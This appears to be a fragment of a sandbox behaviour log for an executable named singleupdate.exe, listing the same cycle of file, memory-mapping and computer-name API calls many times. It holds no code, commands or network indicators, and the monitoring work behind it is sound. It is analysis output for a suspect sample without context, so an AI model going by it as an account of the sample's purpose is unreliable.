| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
